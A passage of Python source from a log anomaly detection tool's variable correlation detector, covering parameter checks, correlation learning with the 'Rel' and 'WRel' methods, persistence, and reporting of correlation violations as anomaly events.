check_cor_num_thres=check_cor_num_thres, min_values_cors_thres=min_values_cors_thres, new_vals_alarm_thres=new_vals_alarm_thres, num_bt=num_bt, alpha_bt=alpha_bt, used_homogeneity_test=used_homogeneity_test, alpha_chisquare_test=alpha_chisquare_test, max_dist_rule_distr=max_dist_rule_distr, used_presel_meth=used_presel_meth, intersect_presel_meth=intersect_presel_meth, percentage_random_cors=percentage_random_cors, match_disc_vals_sim_tresh=match_disc_vals_sim_tresh, exclude_due_distr_lower_limit=exclude_due_distr_lower_limit, match_disc_distr_threshold=match_disc_distr_threshold, used_cor_meth=used_cor_meth, used_validate_cor_meth=used_validate_cor_meth, validate_cor_cover_vals_thres=validate_cor_cover_vals_thres, validate_cor_distinct_thres=validate_cor_distinct_thres, ignore_list=ignore_list, constraint_list=constraint_list, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not isinstance(self.event_type_detector, EventTypeDetector): msg = "event_type_detector must be an instance of EventTypeDetector." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.event_type_detector.add_following_modules(self) self.variable_type_detector = None if any(self.event_type_detector.following_modules[j].__class__.__name__ == "VariableTypeDetector" for j in range( len(self.event_type_detector.following_modules))): try: self.variable_type_detector = self.event_type_detector.following_modules[next(j for j in range( len(self.event_type_detector.following_modules)) if self.event_type_detector.following_modules[j].__class__.__name__ == "VariableTypeDetector")] except StopIteration: pass if self.event_type_detector.min_num_vals < max(num_init, num_update): msg = f"Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to " \ f"{max(num_init, num_update)} to prevent errors in the execution of the VCD" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) self.event_type_detector.min_num_vals = max(num_init, num_update) if self.event_type_detector.max_num_vals < max(num_init, num_update) + 500: msg = f"Changed the parameter max_num_vals of the ETD from {self.event_type_detector.max_num_vals} to " \ f"{max(num_init, num_update) + 500} to prevent errors in the execution of the VCD" logging.getLogger(DEBUG_LOG_NAME).warning(msg) print("WARNING: " + msg, file=sys.stderr) self.event_type_detector.max_num_vals = max(num_init, num_update) + 500 if self.used_homogeneity_test not in ["Chi", "MaxDist"]: raise ValueError(f"The homogeneity test '{used_homogeneity_test}' does not exist!") if self.used_presel_meth is None: self.used_presel_meth = [] for presel_meth in self.used_presel_meth: if presel_meth not in ["matchDiscDistr", "excludeDueDistr", "matchDiscVals", "random"]: raise ValueError(f"The preselection method '{presel_meth}' does not exist!") if self.percentage_random_cors <= 0. or self.percentage_random_cors >= 1.: raise ValueError("The Random preselection method makes no sense if percentage_random_cors = %f. If the percentage_random_cors" " is >= 1.0 better use no preselection method for that case.") if self.used_cor_meth is None or self.used_cor_meth == []: self.used_cor_meth = ["Rel", "WRel"] for cor_meth in self.used_cor_meth: if cor_meth not in ["Rel", "WRel"]: raise ValueError(f"The correlation rule '{cor_meth}' does not exist!") if self.used_validate_cor_meth is None: self.used_validate_cor_meth = ["coverVals", "distinctDistr"] # The distinctDistr validation requires the "WRel" method. if "WRel" not in self.used_cor_meth: self.used_validate_cor_meth = ["coverVals"] for validate_cor_meth in self.used_validate_cor_meth: if validate_cor_meth not in ["coverVals", "distinctDistr"]: raise ValueError(f"The validation correlation rule '{validate_cor_meth}' does not exist!") if "WRel" not in self.used_cor_meth and "distinctDistr" in self.used_validate_cor_meth: raise ValueError("The 'distinctDistr' validation correlation rule requires the 'WRel' correlation method!") # Calculate the minimal number of successes for the BT self.min_successes_bt = self.bt_min_successes(self.num_bt, 1 - self.alpha_bt, self.alpha_bt) self.update_rules = [] # List which states for what event types the rules are updated self.generate_rules = [] # List which states for what event types new rules are being generated self.min_successes_bt = 0 # Minimal number of successes for the binomialtest self.discrete_indices = [] # List of the indices to every event type which are assumed to be discrete self.pos_var_val = [] # List of the possible values to the single variables of the event types self.pos_var_cor = [] # List of all pairs of variables of the event types which are assumed to be correlated self.rel_list = [] # List of lists, that saves the data for the found correlations with the method Rel. # First index states the event_index, second index states which correlation is examined, third index states which direction of the # correlation is examined, fourth index states the value of the first variable and the fifth value states the value of the second # variable. The content is the number of appearance in the log lines. self.w_rel_list = [] # List of lists, that saves the data for the correlation finding with WRel. # First index states the event_index, second index states which correlation is examined, third index states which direction of the # correlation is examined, fourth index states the value of the first variable and the fifth value states the value of the second # variable. The content is the number of appearance in the log lines. self.w_rel_num_ll_to_vals = [] # List of the number of lines in which the values of the first variable have appeared self.w_rel_ht_results = [] # List of the results of the homogeneity tests for the binomial test self.w_rel_confidences = [] # List for the confidences of the homogeneity tests self.initialized = [] # List that states if the single event types have been initialized at least once self.log_atom = None # Loads the persistence self.persistence_id = persistence_id self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Imports the persistence if self.event_type_detector.load_persistence_data is True self.load_persistence_data() def receive_atom(self, log_atom): """Receive an parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return False event_index = self.event_type_detector.current_index if event_index == -1: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False parser_match = log_atom.parser_match for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False self.log_atom = log_atom if self.event_type_detector.num_event_lines[event_index] >= self.num_init and ( len(self.initialized) <= event_index or not self.initialized[event_index]): # Initialisation Phase self.init_cor(event_index) # Initialise the correlations if self.update_rules[event_index] and self.learn_mode: self.validate_cor() # Validate the correlations and removes the cors, which fail the requirements if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time # Print the found correlations if "Rel" in self.used_cor_meth: self.print_ini_rel(event_index) if "WRel" in self.used_cor_meth: self.print_ini_w_rel(event_index) # Updates or tests the correlations elif self.event_type_detector.num_event_lines[event_index] > self.num_init and \ (self.event_type_detector.num_event_lines[event_index] - self.num_init) % self.num_update == 0: # Checks if the correlations should be updated or tested if self.num_end_learning_phase < 0 or self.event_type_detector.num_event_lines[event_index]-self.num_init <= \ (self.num_update*self.num_end_learning_phase): # Update Phase self.update_rules[event_index] = True if self.num_steps_create_new_rules > 0 and ((self.event_type_detector.num_event_lines[ event_index]-self.num_init) / self.num_update) % self.num_steps_create_new_rules == 0: # generate new rules self.generate_rules[event_index] = True else: self.generate_rules[event_index] = False else: # Test Phase self.update_rules[event_index] = False self.generate_rules[event_index] = False # Updates or tests the correlations self.update_or_test_cor(event_index) if self.generate_rules[event_index] and ((self.event_type_detector.num_event_lines[ event_index] - self.num_init) / self.num_update / self.num_steps_create_new_rules) % self.num_upd_until_validation == 0: self.validate_cor() # Validate the correlations and removes the cors, which fail the requirements return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [self.pos_var_cor, self.pos_var_val, self.discrete_indices, self.update_rules, self.generate_rules, self.rel_list, self.w_rel_list, self.w_rel_num_ll_to_vals, self.w_rel_ht_results, self.w_rel_confidences] PersistenceUtil.store_json(self.persistence_file_name, persistence_data) def load_persistence_data(self): """Extract the persistence data and appends various lists to create a consistent state.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.pos_var_cor = persistence_data[0] self.pos_var_val = persistence_data[1] self.discrete_indices = persistence_data[2] self.update_rules = persistence_data[3] self.generate_rules = persistence_data[4] self.rel_list = persistence_data[5] self.w_rel_list = persistence_data[6] self.w_rel_num_ll_to_vals = persistence_data[7] self.w_rel_ht_results = persistence_data[8] self.w_rel_confidences = persistence_data[9] self.initialized = [False for _ in self.pos_var_cor] for event_index, indices in enumerate(self.discrete_indices): if len(indices) > 0: self.initialized[event_index] = True def init_cor(self, event_index): """Initialise the possible correlations and runs the init-functions for the methods in self.used_cor_meth.""" # Append the supporting lists if necessary if len(self.pos_var_cor) < event_index+1: for i in range(event_index + 1 - len(self.pos_var_cor)): self.pos_var_cor.append([]) self.pos_var_val.append([]) self.discrete_indices.append([]) self.update_rules.append(True) self.generate_rules.append(True) self.initialized.append(False) self.initialized[event_index] = True # Initialise the indices to the assumed discrete variables if len(self.discrete_indices[event_index]) == 0: # If the var_typeD is linked, append the discrete fields if self.variable_type_detector is not None: for i in range(len(self.event_type_detector.variable_key_list[event_index])): if len(self.variable_type_detector.var_type[event_index][i]) > 0 and \ self.variable_type_detector.var_type[event_index][i][0] == "d" and ( self.target_path_list == [] or self.event_type_detector.variable_key_list[event_index][i] in self.target_path_list): self.discrete_indices[event_index].append(i) self.pos_var_val[event_index].append(self.variable_type_detector.var_type[event_index][i][1]) # Else use the variables which are neither unique nor static # !!! else: self.discrete_indices[event_index] = [ var_index for var_index in range(len(self.event_type_detector.variable_key_list[event_index])) if self.target_path_list == [] or self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list] for i in range(len(self.event_type_detector.values[event_index]) - 1, -1, -1): tmp_list = list(set(self.event_type_detector.values[event_index][i][-self.num_init:])) if len(tmp_list) == 1 or (len(tmp_list) > self.disc_div_thres * self.num_init): del self.discrete_indices[event_index][i] else: self.pos_var_val[event_index].append(tmp_list) self.pos_var_val[event_index].reverse() # Initialise the list of the possible correlations # If no preselection method is used all discrete variables are matched with each other if not self.used_presel_meth: self.pos_var_cor[event_index] = [[i, j] for i in range(len(self.discrete_indices[event_index])) for j in range( i+1, len(self.discrete_indices[event_index]))] # Else the preselection methods are used to generate the list of possible correlations else: first_run = True # Only used if the interception of the preselected possible correlations are further analysed # Generate the possible correlations for the preselection methods for meth in self.used_presel_meth: tmp_pos_var_cor = [] # List of the possible correlations for one preselection method if self.variable_type_detector is None: variable_values = [[] for _ in range(len(self.discrete_indices[event_index]))] variable_distributions = [[] for _ in range(len(self.discrete_indices[event_index]))] for i, val in enumerate(self.discrete_indices[event_index]): for j in range(-1, -self.num_init-1, -1): if self.event_type_detector.values[event_index][val][j] not in variable_values[i]: variable_values[i].append(self.event_type_detector.values[event_index][val][j]) variable_distributions[i].append(1) else: variable_distributions[i][variable_values[i].index(self.event_type_detector.values[event_index][ val][j])] += 1 tmp_sum = sum(variable_distributions[i]) variable_distributions[i] = [variable_distributions[i][j]/tmp_sum for j in range( len(variable_distributions[i]))] if meth == "excludeDueDistr": useable_indices = [] # list of the indices, which are not excluded if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): if self.pick_cor_exclude_due_distr(self.variable_type_detector.var_type[event_index][val][2]): # Add the index to the list of useable indices if it is not excluded useable_indices.append(i) else: for i in range(len(self.discrete_indices[event_index])): if self.pick_cor_exclude_due_distr(variable_distributions[i]): # Add the index to the list of useable indices if it is not excluded useable_indices.append(i) tmp_pos_var_cor = [[i, j] for i in useable_indices for j in useable_indices if i < j] elif meth == "matchDiscDistr": if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): for j in range(i+1, len(val)): if self.pick_cor_match_disc_distr(self.variable_type_detector.var_type[event_index][ val][2], self.variable_type_detector.var_type[event_index][ self.discrete_indices[event_index][j]][2]): # If self.pick_cor_match_disc_distr returned True the indices are being appended tmp_pos_var_cor.append([i, j]) else: for i in range(len(self.discrete_indices[event_index])): for j in range(i+1, len(self.discrete_indices[event_index])): if self.pick_cor_match_disc_distr(variable_distributions[i], variable_distributions[j]): # If self.pick_cor_match_disc_distr returned True the indices are being appended tmp_pos_var_cor.append([i, j]) elif meth == "matchDiscVals": if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): for j in range(i+1, len(self.discrete_indices[event_index])): if self.pick_cor_match_disc_vals(self.variable_type_detector.var_type[event_index][ val][1], self.variable_type_detector.var_type[event_index][ self.discrete_indices[event_index][j]][1]): # If self.pick_cor_match_disc_vals returned True the indices are being appended tmp_pos_var_cor.append([i, j]) else: for i in range(len(self.discrete_indices[event_index])): for j in range(i+1, len(self.discrete_indices[event_index])): if self.pick_cor_match_disc_vals(variable_values[i], variable_values[j]): # If self.pick_cor_match_disc_vals returned True the indices are being appended tmp_pos_var_cor.append([i, j]) elif meth == "random": tmp_pos_var_cor = self.pick_cor_random(event_index) # Initialize, append or intercept self.pos_var_cor with tmp_pos_var_cor # Initialize self.pos_var_cor if first_run: first_run = False self.pos_var_cor[event_index] = tmp_pos_var_cor # Intercept self.pos_var_cor elif self.intersect_presel_meth: for i in range(len(self.pos_var_cor[event_index]) - 1, -1, -1): if self.pos_var_cor[event_index][i] not in tmp_pos_var_cor: del self.pos_var_cor[event_index][i] # Append self.pos_var_cor else: for cor in tmp_pos_var_cor: if cor not in self.pos_var_cor[event_index]: self.pos_var_cor[event_index].append(cor) # Initialise the correlation methods for meth in self.used_cor_meth: if meth == "Rel": self.init_cor_rel(event_index) elif meth == "WRel": self.init_cor_w_rel(event_index) def init_cor_rel(self, event_index): """Initialize supporting lists for the method "Rel".""" # Initialise self.rel_list if len(self.rel_list) < event_index+1: for i in range(event_index + 1 - len(self.rel_list)): self.rel_list.append([]) if len(self.rel_list[event_index]) == 0: for i in range(len(self.pos_var_cor[event_index])): self.rel_list[event_index].append([{}, {}]) # Only calculate the correlations once, because the used method allows to efficiently calculate both directions in parallel for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices for k in range(-1, -self.num_init-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Check if i_val has not appeared previously if i_val not in self.rel_list[event_index][pos_var_cor_index][0]: # Add the relation i=i_val -> j=j_val self.rel_list[event_index][pos_var_cor_index][0][i_val] = {j_val: 1} # If the j_val has already appeared, then the var i had another value than i_val, # therefore the relation j:j_val -> i:i_val is not possible if j_val in self.rel_list[event_index][pos_var_cor_index][1]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] # Else add the relation j=j_val -> i=i_val else: self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 1} continue # Check if j_val has not appeared previously if j_val not in self.rel_list[event_index][pos_var_cor_index][1]: # Add the relation j=j_val -> i=i_val self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 1} # i=i_val -> j=j_val is not possible del self.rel_list[event_index][pos_var_cor_index][0][i_val] continue # At least two possible values, therefore delete the relation if self.rel_list[event_index][pos_var_cor_index][0][i_val] != {} and j_val not in self.rel_list[event_index][ pos_var_cor_index][0][i_val]: del self.rel_list[event_index][pos_var_cor_index][0][i_val] # At least two possible values, therefore delete the relation if self.rel_list[event_index][pos_var_cor_index][1][j_val] != {} and i_val not in self.rel_list[event_index][ pos_var_cor_index][1][j_val]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] # Update the appearance of the relation if (i_val in self.rel_list[event_index][pos_var_cor_index][0]) and (j_val in self.rel_list[event_index][ pos_var_cor_index][0][i_val]): self.rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 if (j_val in self.rel_list[event_index][pos_var_cor_index][1]) and (i_val in self.rel_list[event_index][ pos_var_cor_index][1][j_val]): self.rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 def init_cor_w_rel(self, event_index): """Initialize w_rel_list and runs init_single_cor_w_rel for the chosen indices.""" # Append the w_rel_list and w_rel_num_ll_to_vals if necessary if len(self.w_rel_list) < event_index+1: for _ in range(event_index + 1 - len(self.w_rel_list)): self.w_rel_list.append([]) self.w_rel_num_ll_to_vals.append([]) if len(self.w_rel_list[event_index]) == 0: for _ in range(len(self.pos_var_cor[event_index])): self.w_rel_list[event_index].append([{}, {}]) self.w_rel_num_ll_to_vals[event_index].append([{}, {}]) # Only initialize the correlations once, because the used method allows to efficiently calculate both directions in parallel for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): self.init_single_cor_w_rel(event_index, pos_var_cor_index) def init_single_cor_w_rel(self, event_index, pos_var_cor_index): """Initialize the first entries of w_rel_list.""" i = self.pos_var_cor[event_index][pos_var_cor_index][0] # Index of the first variable in discrete_indices j = self.pos_var_cor[event_index][pos_var_cor_index][1] # Index of the second variable in discrete_indices for k in range(-1, -self.num_init-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Updating both lists in w_rel_list[event_index][pos_var_cor_index] and w_rel_num_ll_to_vals[event_index][pos_var_cor_index] # Add an entry for i_val if necessary if i_val not in self.w_rel_list[event_index][pos_var_cor_index][0]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = 1 else: self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] += 1 # Add an entry for j_val if necessary if j_val not in self.w_rel_list[event_index][pos_var_cor_index][1]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = 1 else: self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] += 1 # Add the entries for j_val if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = 1 # Or update the appearance of the relation else: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 # Add the entries for i_val if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = 1 # Or update the appearance of the relation else: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 # Removes the entries of w_rel_list[event_index][pos_var_cor_index] which can not be considered possible correlations # Generate the list of entries in i, which should be deleted delete_i_vals = [i_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0] if not ( self.check_cor_w_rel(self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values(), len( self.pos_var_val[event_index][j])))] # Delete entries of i for i_val in delete_i_vals: del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] # Generate the list of entries in j, which should be deleted delete_j_vals = [j_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1] if not ( self.check_cor_w_rel(self.w_rel_list[event_index][pos_var_cor_index][1][j_val].values(), len( self.pos_var_val[event_index][i])))] # Delete entries of j for j_val in delete_j_vals: del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] def update_or_test_cor(self, event_index): """Update or test the possible correlations and removes the false ones.""" for meth in self.used_cor_meth: if meth == "Rel": self.update_or_test_cor_rel(event_index) elif meth == "WRel": self.update_or_test_cor_w_rel(event_index) def update_or_test_cor_rel(self, event_index): """Update or test the rel_list.""" for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices if self.update_rules[event_index] and self.learn_mode: # Update both list in rel_list[event_index][pos_var_cor_index] and create new rules if self.generate_rules[event_index] # is True message = f"New values appeared after the {self.event_type_detector.total_records}-th line in correlation(s) of the event" \ f" {self.event_type_detector.get_event_type(event_index)}" confidence = 0 total_correlations = len([None for _ in self.rel_list[event_index][pos_var_cor_index][0]]) + len( [None for _ in self.rel_list[event_index][pos_var_cor_index][1]]) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] value_changes = [] if self.generate_rules[event_index]: failed_i_vals = [] failed_j_vals = [] new_i_vals = [] new_j_vals = [] for k in range(-1, -self.num_update-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Check if i_val has not appeared previously and appends the message to string or save the index in failed_i_vals # if the correlation was violated if i_val not in self.rel_list[event_index][pos_var_cor_index][0] and self.generate_rules[event_index]: # Add the relation i=i_val -> j=j_val self.rel_list[event_index][pos_var_cor_index][0][i_val] = {j_val: 0} new_i_vals.append(i_val) elif i_val in self.rel_list[event_index][pos_var_cor_index][0] and j_val not in self.rel_list[event_index][ pos_var_cor_index][0][i_val]: if not self.generate_rules[event_index] or i_val not in new_i_vals: sorted_log_lines.append( "New value occurred in correlation of the paths %s = %s -> %s = old value: %s / New appeared value: %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(list(self.rel_list[event_index][ pos_var_cor_index][0][i_val].keys())[0]), repr(j_val))) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) change = {"OldValue": repr(list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[0]), "NewValue": repr(j_val)} value_changes.append(change) del self.rel_list[event_index][pos_var_cor_index][0][i_val] confidence += 1 / total_correlations if self.generate_rules[event_index] and i_val not in failed_i_vals: failed_i_vals.append(i_val) # Check if j_val has not appeared previously and appends the message to string or save the index in failed_j_vals if # the correlation was violated if j_val not in self.rel_list[event_index][pos_var_cor_index][1] and self.generate_rules[event_index]: # Add the relation j=j_val -> i=i_val self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 0} new_j_vals.append(j_val) elif j_val in self.rel_list[event_index][pos_var_cor_index][1] and i_val not in self.rel_list[event_index][ pos_var_cor_index][1][j_val]: if not self.generate_rules[event_index] or j_val not in new_j_vals: sorted_log_lines.append( "New value occurred in correlation of the paths %s = %s -> %s = old value: %s / New appeared value: %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(list(self.rel_list[event_index][ pos_var_cor_index][1][j_val].keys())[0]), repr(i_val))) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) change = {"OldValue": repr(list(self.rel_list[event_index][pos_var_cor_index][1][j_val].keys())[0]), "NewValue": repr(i_val)} value_changes.append(change) del self.rel_list[event_index][pos_var_cor_index][1][j_val] confidence += 1 / total_correlations if self.generate_rules[event_index] and j_val not in failed_j_vals: failed_j_vals.append(j_val) # Update the appearance of the relations if (i_val in self.rel_list[event_index][pos_var_cor_index][0]) and (j_val in self.rel_list[event_index][ pos_var_cor_index][0][i_val]): self.rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 if (j_val in self.rel_list[event_index][pos_var_cor_index][1]) and (i_val in self.rel_list[event_index][ pos_var_cor_index][1][j_val]): self.rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 # Print the message if at least one correlation was violated if len(sorted_log_lines) != 0: event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["ValueChanges"] = value_changes event_data["TypeInfo"] = {"Confidence": confidence} for listener in self.anomaly_event_handlers: sorted_log_lines += [""]*(self.event_type_detector.total_records - len(sorted_log_lines)) listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) # Delete the rules which failed during the rule generation phase if self.generate_rules[event_index]: for i_val in failed_i_vals: if i_val in self.rel_list[event_index][pos_var_cor_index][0]: del self.rel_list[event_index][pos_var_cor_index][0][i_val] for j_val in failed_j_vals: if j_val in self.rel_list[event_index][pos_var_cor_index][1]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = self.log_atom.atom_time + self.stop_learning_no_anomaly_time else: # Only update the possible correlations which have been initialized and print warnings reported_values_ij = {} reported_values_ji = {} for k in range(-1, -self.num_update-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # A new value appeared, therefore append the new value to the list reported_values_ij if i_val in self.rel_list[event_index][pos_var_cor_index][0] and self.rel_list[event_index][pos_var_cor_index][0][ i_val] != {} and j_val not in self.rel_list[event_index][pos_var_cor_index][0][i_val]: if i_val not in reported_values_ij: reported_values_ij[i_val] = {j_val: 1} elif j_val in reported_values_ij[i_val]: reported_values_ij[i_val][j_val] += 1 else: reported_values_ij[i_val][j_val] = 1 # A new value appeared, therefore append the new value to the list reported_values_ji if j_val in self.rel_list[event_index][pos_var_cor_index][1] and self.rel_list[event_index][pos_var_cor_index][1][ j_val] != {} and i_val not in self.rel_list[event_index][pos_var_cor_index][1][j_val]: if j_val not in reported_values_ji: reported_values_ji[j_val] = {i_val: 1} elif i_val in reported_values_ji[j_val]: reported_values_ji[j_val][i_val] += 1 else: reported_values_ji[j_val][i_val] = 1 # Print the message of the reported values for i_val in reported_values_ij: message = "Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][pos_var_cor_val[ 1]]], list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[ 0], self.event_type_detector.total_records) confidence = (sum(reported_values_ij[i_val][j_val] for j_val in reported_values_ij[i_val]) / ( sum(reported_values_ij[i_val][j_val] for j_val in reported_values_ij[i_val]) + 1)) * ( len(reported_values_ij[i_val]) / (len(reported_values_ij[i_val]) + 1)) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_values.append(repr(i_val)) affected_values.append(list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[0]) event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedValues"] = affected_values event_data["TypeInfo"] = {"Confidence": confidence} sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) # Print the message of the reported values for j_val in reported_values_ji: message = "Correlation of the paths %s = %s -> %s = %s would be rejected after the %s-th line" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(j_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][self.pos_var_cor[ event_index][pos_var_cor_index][0]]], list(self.rel_list[event_index][pos_var_cor_index][1][ j_val].keys())[0], self.event_type_detector.total_records) confidence = (sum(reported_values_ji[j_val][i_val] for i_val in reported_values_ji[j_val]) / ( sum(reported_values_ji[j_val][i_val] for i_val in reported_values_ji[j_val]) + 1)) * ( len(reported_values_ji[j_val]) / (len(reported_values_ji[j_val]) + 1)) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] affected_values = [] affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_values.append(repr(j_val)) affected_values.append(list(self.rel_list[event_index][pos_var_cor_index][1][j_val].keys())[0]) event_data["AffectedLogAtomPaths"] = list(set(affected_log_atom_paths)) event_data["AffectedValues"] = affected_values event_data["TypeInfo"] = {"Confidence": confidence} sorted_log_lines += [""] * (self.event_type_detector.total_records - len(sorted_log_lines)) for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", message, sorted_log_lines, event_data, self.log_atom, self) def update_or_test_cor_w_rel(self, event_index): """Update or test the w_rel_list.""" # Initialise the lists for the BT results if necessary if len(self.w_rel_ht_results) < event_index + 1 or self.w_rel_ht_results[event_index] == []: self.w_rel_ht_results += [[] for i in range(event_index + 1 - len(self.w_rel_ht_results))] 